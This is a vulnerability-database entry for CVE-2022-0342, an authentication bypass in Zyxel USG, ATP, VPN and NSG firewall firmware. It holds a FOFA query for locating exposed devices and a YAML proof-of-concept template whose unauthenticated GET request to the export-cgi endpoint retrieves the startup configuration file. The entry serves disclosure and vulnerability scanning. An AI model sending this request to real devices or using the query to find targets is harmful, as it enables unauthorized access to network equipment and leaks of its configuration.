CVE-2022-0342: Zyxel authentication bypass patch analysis

日期: 2025-09-01 | 影响软件: Zyxel | POC: 已公开

漏洞描述

An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. FOFA: app="ZyXEL-USG-FLEX"

PoC代码[已公开]

id: CVE-2022-0342

info:
  name: Zyxel authentication bypass patch analysis
  author: xpoc
  severity: high
  verified: false
  description: |
    An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
    FOFA: app="ZyXEL-USG-FLEX"
  reference:
    - https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/
  tags: zyxel,unauthorized,bypass
  created: 2023/06/23

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/export-cgi?category=config&arg0=startup-config.conf
    expression: response.status == 200 && response.body.bcontains(b"interface-name") && response.headers["content-type"].contains("text/zyxel")
expression: r0()

相关漏洞推荐